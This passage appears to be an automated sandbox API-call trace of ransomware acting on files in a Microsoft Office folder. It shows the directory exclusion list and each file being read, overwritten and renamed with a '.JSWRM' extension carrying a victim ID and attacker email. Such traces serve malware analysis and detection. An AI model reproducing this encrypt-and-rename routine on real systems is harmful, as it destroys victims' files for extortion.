lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPAPERS.INI", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPAPERS.INI", lpUsedDefaultChar=0x0) returned 11 [0119.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0119.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPAPERS.INI", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPAPERS.INI", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPAPERS.INI", lpUsedDefaultChar=0x0) returned 11 [0119.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0119.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0119.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0119.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPAPERS.INI" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpapers.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.990] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=6302) returned 1 [0119.990] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1890) returned 0x24e1d8 [0119.990] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1890, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1890, lpOverlapped=0x0) returned 1 [0119.992] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.992] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1890, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1890, lpOverlapped=0x0) returned 1 [0119.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.992] CloseHandle (hObject=0x314) returned 1 [0119.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0119.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0119.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0119.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0119.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0119.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0119.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.993] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPAPERS.INI" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpapers.ini"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPAPERS.INI.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpapers.ini.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0119.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0119.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.994] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR00.GIF", cAlternateFileName="")) returned 1 [0119.994] lstrcmpiW (lpString1="ZPDIR00.GIF", lpString2=".") returned 1 [0119.994] lstrcmpiW (lpString1="ZPDIR00.GIF", lpString2="..") returned 1 [0119.994] lstrcmpiW (lpString1="ZPDIR00.GIF", lpString2="...") returned 1 [0119.994] lstrcmpiW (lpString1="ZPDIR00.GIF", lpString2="windows") returned 1 [0119.994] lstrcmpiW (lpString1="ZPDIR00.GIF", lpString2="recovery") returned 1 [0119.994] lstrcmpiW (lpString1="ZPDIR00.GIF", lpString2="perflogs") returned 1 [0119.994] lstrcmpiW (lpString1="ZPDIR00.GIF", lpString2="documents and settings") returned 1 [0119.994] lstrcmpiW (lpString1="ZPDIR00.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.994] lstrcmpiW (lpString1="ZPDIR00.GIF", lpString2="system volume information") returned 1 [0119.994] lstrcmpiW (lpString1="ZPDIR00.GIF", lpString2="msocache") returned 1 [0119.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0119.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR00.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR00.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR00.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0119.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0119.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR00.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR00.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR00.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0119.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0119.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0119.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR00.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir00.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.995] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=41) returned 1 [0119.995] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0119.995] ReadFile (in: hFile=0x314, lpBuffer=0x2413a8, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2413a8*, lpNumberOfBytesRead=0x345e534*=0x20, lpOverlapped=0x0) returned 1 [0119.996] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.996] WriteFile (in: hFile=0x314, lpBuffer=0x2413a8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2413a8*, lpNumberOfBytesWritten=0x345e530*=0x20, lpOverlapped=0x0) returned 1 [0119.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0119.996] CloseHandle (hObject=0x314) returned 1 [0119.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0119.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0119.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.996] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0119.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0119.996] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0119.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0119.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0119.997] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR00.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir00.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR00.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir00.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0119.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0119.998] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR10F.GIF", cAlternateFileName="")) returned 1 [0119.998] lstrcmpiW (lpString1="ZPDIR10F.GIF", lpString2=".") returned 1 [0119.998] lstrcmpiW (lpString1="ZPDIR10F.GIF", lpString2="..") returned 1 [0119.998] lstrcmpiW (lpString1="ZPDIR10F.GIF", lpString2="...") returned 1 [0119.998] lstrcmpiW (lpString1="ZPDIR10F.GIF", lpString2="windows") returned 1 [0119.998] lstrcmpiW (lpString1="ZPDIR10F.GIF", lpString2="recovery") returned 1 [0119.998] lstrcmpiW (lpString1="ZPDIR10F.GIF", lpString2="perflogs") returned 1 [0119.998] lstrcmpiW (lpString1="ZPDIR10F.GIF", lpString2="documents and settings") returned 1 [0119.998] lstrcmpiW (lpString1="ZPDIR10F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.998] lstrcmpiW (lpString1="ZPDIR10F.GIF", lpString2="system volume information") returned 1 [0119.998] lstrcmpiW (lpString1="ZPDIR10F.GIF", lpString2="msocache") returned 1 [0119.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0119.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR10F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0119.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR10F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR10F.GIF", lpUsedDefaultChar=0x0) returned 12 [0119.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0119.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0119.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR10F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0119.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR10F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR10F.GIF", lpUsedDefaultChar=0x0) returned 12 [0119.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0119.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.998] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR10F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir10f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.999] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=5037) returned 1 [0119.999] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13a0) returned 0x24e1d8 [0119.999] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x13a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x13a0, lpOverlapped=0x0) returned 1 [0120.001] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.001] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x13a0, lpOverlapped=0x0) returned 1 [0120.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.001] CloseHandle (hObject=0x314) returned 1 [0120.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0120.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0120.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0120.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0120.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.002] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR10F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir10f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR10F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir10f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0120.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0120.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.003] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1706, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR11F.GIF", cAlternateFileName="")) returned 1 [0120.003] lstrcmpiW (lpString1="ZPDIR11F.GIF", lpString2=".") returned 1 [0120.003] lstrcmpiW (lpString1="ZPDIR11F.GIF", lpString2="..") returned 1 [0120.003] lstrcmpiW (lpString1="ZPDIR11F.GIF", lpString2="...") returned 1 [0120.003] lstrcmpiW (lpString1="ZPDIR11F.GIF", lpString2="windows") returned 1 [0120.003] lstrcmpiW (lpString1="ZPDIR11F.GIF", lpString2="recovery") returned 1 [0120.003] lstrcmpiW (lpString1="ZPDIR11F.GIF", lpString2="perflogs") returned 1 [0120.003] lstrcmpiW (lpString1="ZPDIR11F.GIF", lpString2="documents and settings") returned 1 [0120.003] lstrcmpiW (lpString1="ZPDIR11F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.003] lstrcmpiW (lpString1="ZPDIR11F.GIF", lpString2="system volume information") returned 1 [0120.003] lstrcmpiW (lpString1="ZPDIR11F.GIF", lpString2="msocache") returned 1 [0120.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0120.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR11F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR11F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR11F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0120.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0120.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR11F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR11F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR11F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0120.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0120.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 